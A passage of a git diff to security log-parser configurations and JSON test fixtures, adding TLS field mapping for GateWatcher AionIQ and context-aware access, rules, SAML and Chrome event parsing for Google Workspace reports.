"Darktrace", "product": "Threat visualizer" - }, - "related": { - "ip": [] } } } \ No newline at end of file diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json index 90d9307b3..5092ebe13 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json @@ -118,15 +118,11 @@ } }, "host": { - "id": "16", - "ip": [] + "id": "16" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" - }, - "related": { - "ip": [] } } } \ No newline at end of file diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json index 9ae53b161..7866f9581 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json @@ -114,16 +114,12 @@ } }, "host": { - "id": "6", - "ip": [] + "id": "6" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" }, - "related": { - "ip": [] - }, "service": { "name": "Slack" }, diff --git a/Fortinet/fortigate/ingest/parser.yml b/Fortinet/fortigate/ingest/parser.yml index 311e0deb0..cbb9b311a 100644 --- a/Fortinet/fortigate/ingest/parser.yml +++ b/Fortinet/fortigate/ingest/parser.yml @@ -191,7 +191,7 @@ stages: event.action: "{{parsed_event.message.name or parsed_event.message.FTNTFGTaction or parsed_event.message.FortinetFortiGateaction or parsed_event.message.act or parsed_event.message.action or parsed_event.message.reason}}" destination.address: "{{parsed_event.message.dstip or parsed_event.message.dst}}" destination.bytes: "{{parsed_event.message.rcvdbyte or parsed_event.message.in}}" - destination.domain: "{{parsed_event.message.hostname or parsed_event.message.dhost}}" + destination.domain: "{{parsed_event.message.remotename or parsed_event.message.dhost or parsed_event.message.hostname}}" destination.mac: "{{parsed_event.message.dstmac}}" destination.nat.port: "{{parsed_event.message.destinationTranslatedPort}}" destination.packets: "{{parsed_event.message.rcvdpkt or parsed_event.message.FTNTFGTrcvpkt or parsed_event.message.FortinetFortiGatercvdpkt or parsed_event.message.get('Packets Received')}}" diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index d0d85f7f6..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -385,11 +385,20 @@ gatewatcher.tlp: type: text gatewatcher.tls: - description: This field represents the tls field in a network metadata (used in - legacy format log) + description: This field contains all TLS data fields in a TLS metadata name: gatewatcher.tls type: text +gatewatcher.tls_fingerprint: + description: This field represents the TLS server fingerprint field in a TLS metadata + name: gatewatcher.tls_fingerprint + type: text + +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 45330587a..845abe396 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -10,7 +10,7 @@ pipeline: external: name: date.parse properties: - input_field: "{{json_load.message.timestamp_analyzed}}" + input_field: "{{json_load.message.timestamp_detected}}" output_field: datetime format: null timezone: UTC @@ -29,6 +29,8 @@ pipeline: description: DGA - name: retrohunt description: Retrohunt + - name: tls + description: TLS stages: common: actions: @@ -122,7 +124,6 @@ stages: gatewatcher.sip: "{{json_load.message.sip}}" gatewatcher.smb: "{{json_load.message.smb}}" gatewatcher.ssh: "{{json_load.message.ssh}}" - gatewatcher.tls: "{{json_load.message.tls}}" file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" gatewatcher.dhcp: "{{json_load.message.dhcp}}" gatewatcher.dnp3: "{{json_load.message.dnp3}}" @@ -202,3 +203,16 @@ stages: gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}" gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}" gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}" + tls: + actions: + - set: + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json index f16f95623..6d7eb789a 100644 --- a/GateWatcher/aioniq/tests/codebreaker.json +++ b/GateWatcher/aioniq/tests/codebreaker.json @@ -17,7 +17,7 @@ "module": "powershell", "severity": 1 }, - "@timestamp": "2023-03-22T10:32:50.269000Z", + "@timestamp": "2023-03-22T10:30:37.145000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index b9db082ca..9d702ce4d 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json @@ -17,7 +17,7 @@ "module": "dga", "severity": 1 }, - "@timestamp": "2023-03-22T10:46:08.487000Z", + "@timestamp": "2023-03-22T10:25:54.903000Z", "destination": { "address": "pgoadcmgqfacj.com", "domain": "pgoadcmgqfacj.com", diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index ba95cc211..b5d0a4f69 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json @@ -20,7 +20,7 @@ "info" ] }, - "@timestamp": "2023-03-22T10:53:13.408000Z", + "@timestamp": "2023-03-22T10:35:22.615000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json index fd29bcfa4..7c8728304 100644 --- a/GateWatcher/aioniq/tests/retrohunt.json +++ b/GateWatcher/aioniq/tests/retrohunt.json @@ -17,7 +17,7 @@ "module": "retrohunt", "severity": 1 }, - "@timestamp": "2023-06-12T10:12:39.001000Z", + "@timestamp": "2023-06-09T14:08:46.845000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json index 1de9534f5..626ee8eb7 100644 --- a/GateWatcher/aioniq/tests/sigflow-alert.json +++ b/GateWatcher/aioniq/tests/sigflow-alert.json @@ -19,7 +19,7 @@ "module": "alert", "severity": 1 }, - "@timestamp": "2023-03-22T10:44:08.001000Z", + "@timestamp": "2023-03-22T10:25:55.690000Z", "destination": { "address": "2.2.2.2", "bytes": 90364, diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json index 2e1580dce..7e9cc8b6a 100644 --- a/GateWatcher/aioniq/tests/sigflow-file.json +++ b/GateWatcher/aioniq/tests/sigflow-file.json @@ -16,7 +16,7 @@ ], "module": "fileinfo" }, - "@timestamp": "2023-03-22T10:44:07.998000Z", + "@timestamp": "2023-03-22T10:25:55.469000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json index 4da5dbc30..6e8cba037 100644 --- a/GateWatcher/aioniq/tests/sigflow-meta.json +++ b/GateWatcher/aioniq/tests/sigflow-meta.json @@ -16,7 +16,7 @@ ], "module": "http" }, - "@timestamp": "2023-03-22T10:44:07.997000Z", + "@timestamp": "2023-03-22T10:25:55.377000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json new file mode 100644 index 000000000..ff8624608 --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-tls.json @@ -0,0 +1,68 @@ +{ + "input": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ v102", + "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26" + } + } + }, + "expected": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "event": { + "category": [ + "network" + ], + "module": "tls" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "gatewatcher": { + "event_type": "tls", + "flow_id": "1366008699485799", + "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}", + "tls_sni": "www.microsoft.com", + "type": "suricata" + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "82:df:ee:4f:81:af", + "e6:43:7e:91:1b:92" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxxx.domain.local" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 64809 + }, + "tls": { + "server": { + "ja3s": "15af977ce25de452b96affa2addb1036" + }, + "version": "TLS 1.3" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..a8ee3a54d 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -1,3 +1,8 @@ +google.report.access.application: + description: Application name + name: google.report.access.application + type: keyword + google.report.actor.email: description: '' name: google.report.actor.email @@ -33,6 +38,46 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword +google.report.rule.data_source: + description: Data source + name: google.report.rule.data_source + type: keyword + +google.report.rule.name: + description: Name of the rule + name: google.report.rule.name + type: keyword + +google.report.rule.scan_type: + description: Scan type + name: google.report.rule.scan_type + type: keyword + +google.report.rule.severity: + description: Severity of the rule + name: google.report.rule.severity + type: keyword + +google.report.rule.type: + description: Rule type + name: google.report.rule.type + type: keyword + +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name + type: keyword + +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator + type: keyword + +google.report.saml.status_code: + description: SAML response status + name: google.report.saml.status_code + type: keyword + google.report.token.app_name: description: Token authorization application name name: google.report.token.app_name diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..4633f32de 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -168,6 +168,273 @@ } ] }, + { + "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}", + "conditions": [ + { + "field": "network.application", + "value": "context_aware_access" + }, + { + "field": "google.report.access.application" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + } + ] + }, + { + "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "action_complete" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "The {google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "content_matched" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + }, + { + "field": "google.report.saml.status_code" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "field": "device.model.name" + }, + { + "field": "device.model.identifier" + } + ] + }, + { + "value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGOUT_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..4f5192ea6 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -1,4 +1,5 @@ name: google-report +ignored_values: ["UNKNOWN"] pipeline: - name: json_event external: @@ -28,6 +29,14 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_context_aware_fields + filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}' + - name: set_rules_fields + filter: '{{ json_event.message.id.applicationName == "rules"}}' + - name: set_saml_fields + filter: '{{ json_event.message.id.applicationName == "saml"}}' + - name: set_chrome_fields + filter: '{{ json_event.message.id.applicationName == "chrome"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -157,6 +166,8 @@ stages: network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}' google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}' + user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}' + source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}' set_groups_enterprise_fields: actions: @@ -258,3 +269,69 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_context_aware_fields: + actions: + - set: + event.type: ["denied"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' + google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' + + set_rules_fields: + actions: + - set: + google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["info"] + filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}' + + - set: + event.type: ["deletion"] + filter: '{{ json_event.message.events[0].name == "label_removed"}}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}' + + set_saml_fields: + actions: + - set: + event.category: ["authentication"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["allowed"] + filter: '{{ json_event.message.events[0].name == "login_success"}}' + + - set: + event.type: ["denied"] + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' + + set_chrome_fields: + actions: + - set: + event.category: ["web"] + organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}' + host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' + + - set: + event.type: ["connection"] + filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}' diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json new file mode 100644 index 000000000..e83076db1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_access_sample_1.json @@ -0,0 +1,58 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + "report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json new file mode 100644 index 000000000..6567eebf1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -0,0 +1,53 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": 